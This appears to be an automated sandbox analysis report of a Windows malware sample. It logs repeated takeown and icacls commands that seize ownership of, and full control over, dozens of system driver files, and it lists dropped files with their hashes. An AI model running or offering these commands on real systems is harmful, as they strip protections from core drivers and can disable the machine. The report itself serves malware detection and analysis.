
C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\RDPREFMP.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-916315556439755407-381308980745487091-169136944-64473160512070915652070392094"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdpwd.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdpwd.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdyboost.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rmcast.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdyboost.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\RDPENCDD.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\RNDISMP.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rmcast.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rootmdm.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rootmdm.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rspndr.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rspndr.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Rtnic64.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sbp2port.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\scfilter.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\scsiport.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\secdrv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\scfilter.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\sbp2port.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\scsiport.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\serenum.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\serial.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\serenum.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\serial.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\secdrv.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sermouse.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "15344800202137093176406314723293335712947188773-488891011439750706-1659464260"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sffdisk.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\sffdisk.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\sermouse.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sffp_sd.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sfloppy.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sffp_mmc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sisraid2.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1125354534590514936-1738641181-6142234731286022838-1541628933-241191022-1619567691"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1238723083118943304815113528092003344646-2021521300-1962733712631438662-1273047455"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\smb.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "99023886921229104857218914281466535866-105616059949538584-1632466562-1580663077"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-613262797-632831008413378247928700766-8327360361806352757-1564394622-777341449"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\smclib.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\sisraid2.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sisraid4.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\spldr.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-4453393284877430879489670861819298889-172267507-1416106229-1833059320177612445"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\spsys.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\srv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-4847036265668341801494563843449304789-101850907-2011999258-230338033-1151830724"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\srv2.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\sfloppy.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\srvnet.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\stexstor.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "298359664760376584978317091166541938-737916535-8702826341629261543-746484141"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-360201735-1801934429839665740-103911356-9133272525561906221640185144711556680"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "106609209022490388107481678113137639611909434053-1731460742-8304431521083956935"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\storport.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\storvsc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2031670385-14369834731391235769465200207-547737405228837534-1152513203565108070"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "130102942-1493490392922375069-1388166830-854142171-87801608817866582451084749259"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "49255452318508905351991860313160279393924570306-1818200375-2072825947-2033946914"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-9883672361587927936-1612806769-12319630832100072753-3592211522077681682-1305661662"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\swenum.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\stream.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-319884872-14577782641813179694-445301543-1894805141-521711534930589289-545189033"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tape.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "15179926901253899662-483301400397829661-627051940-1705405175-646965893-2034564305"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "4787987285335741942027047390405665056-1890361548-1949289471802832963-616246289"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-87547369720777135715554310231390238819-201571095414759424851107393165-115667792"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\smb.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tcpipreg.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tcpip.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-26027975-876246110-608834837134290068724923552075125541813013395481276254124"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbehci.sys && icacls C:\Windows\System32\drivers\usbehci.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "2025113151-8795427092067812912650575155-3339911371846147979-6517369661905897753"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbhub.sys && icacls C:\Windows\System32\drivers\usbhub.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tdi.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbohci.sys && icacls C:\Windows\System32\drivers\usbohci.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\smclib.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tdpipe.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tdx.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-14499180402035388741116823861012085003124552242271534490460124705801769589372"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tdtcp.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbport.sys && icacls C:\Windows\System32\drivers\usbport.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbprint.sys && icacls C:\Windows\System32\drivers\usbprint.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "584576910-174048410613892608711666903192-1660184892-559374804-1807097679-1555800127"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1267934725-8154128614199321579565337252446016671272705207-2577031261175705719"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\termdd.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbrpm.sys && icacls C:\Windows\System32\drivers\usbrpm.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1702669807-868737017-13392171311676482713-208732590-72120041115349837561363357888"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1527069323-479126745-1182175260-973298374-19554108921193406818499532562648656549"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\sisraid4.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\spldr.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBSTOR.SYS && icacls C:\Windows\System32\drivers\USBSTOR.SYS /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\terminpt.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbuhci.sys && icacls C:\Windows\System32\drivers\usbuhci.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-769185103-1302369232-2120128782-758459001532378506354655028-19192100561515566642"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vdrvroot.sys && icacls C:\Windows\System32\drivers\vdrvroot.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "194814197816451902201348064592-13675452841673899375-65996249-40242482184677791"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tssecsrv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vga.sys && icacls C:\Windows\System32\drivers\vga.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vgapnp.sys && icacls C:\Windows\System32\drivers\vgapnp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\TsUsbGD.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vhdmp.sys && icacls C:\Windows\System32\drivers\vhdmp.sys /grant "%username%:F" && exit

Network

N/A

Files

memory/2908-0-0x000000013F300000-0x000000013F36C000-memory.dmp

memory/2908-1-0x000007FEF5C40000-0x000007FEF662C000-memory.dmp

memory/2908-2-0x000000001AFE0000-0x000000001B060000-memory.dmp

memory/2908-3-0x000007FEF5C40000-0x000007FEF662C000-memory.dmp

memory/2908-4-0x000000001AFE0000-0x000000001B060000-memory.dmp

C:\Users\Admin\Desktop\4ö♦—¬6ÿ◙◄╬╔╥Âπ6£╬ÿεž×õě™♠Âπ▲▼∞╩∩■╧♣σ²±▼╠ø∩►å¤ïï—▬₧ó▄¾σ½ß²♦√♫½◄ñ♣♂╬—čõ¢¢≈►╥2æÇń╚▄╚≈¶╠¼3╚½√╤▌√¥♣ñÆ◘▀«ž

MD5 9e1e5883c74742a497cf5c272ccd2321
SHA1 2cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256 ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512 f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b

C:\Users\Admin\AppData\Local\Temp\wallpaper.bmp

MD5 18e0b500eebdd3f868af5388baa7ff79
SHA1 49a5acb14e59a9e2fb370425bffcda9d00d84fb6
SHA256 9a1dbb8a87da13e11ac40e6d77981cac8698aa289b87f0db8ee5240f6cbd31df
SHA512 15415fe9e2a384e2190a3d24ab34614f871cc8666e333add5fb4b5029464c1dd7f09bb917908d7e62fbfe27fc0b13ef1f6ddd9d8a5b077c4e4729f06ff407dc4

C:\Windows\System32\kill.ico

MD5 373d53d7c6709d5106b29a26a71b0d31
SHA1 1708009c111266ba513503e06b94a5ccd402dee5
SHA256 de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86
SHA512 15b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d